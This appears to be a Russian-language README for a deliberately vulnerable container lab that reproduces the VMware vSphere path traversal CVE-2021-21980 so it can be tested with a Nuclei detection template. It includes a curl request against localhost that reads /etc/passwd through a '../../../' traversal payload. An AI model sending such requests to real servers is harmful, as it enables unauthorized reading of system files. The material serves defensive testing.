
Реалистичная уязвимая лаборатория для CVE-2021-21980 (VMware vSphere Path Traversal) - реальная эксплуатация файлов, а не имитация сервера
Реалистичная тестовая среда, имитирующая уязвимость обхода пути в VMware vSphere Web Client.
⚠️ ВНИМАНИЕ: Уязвимая тестовая среда. Не подвергайте воздействию Интернета!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ Реально читает файлы из файловой системы контейнера с помощью файлового ввода-вывода Python
✅ Реалистичное поведение — обрабатывает обход пути как настоящий vSphere
✅ Заголовки VMware — включает Server: VMware-HTTP-Server/1.0
✅ SSL/TLS — генерация самоподписанного сертификата
✅ Не захардкожено — возвращает реальное содержимое файлов
Dockerfile — конфигурация сборки контейнераserver.py — уязвимое Flask-приложениеCVE-2021-21980.yaml — шаблон обнаружения NucleiREADME.md — этот файлЭта лабораторная среда была проверена с помощью Nuclei, что показало:
podman stop vcenter-lab && podman rm vcenter-lab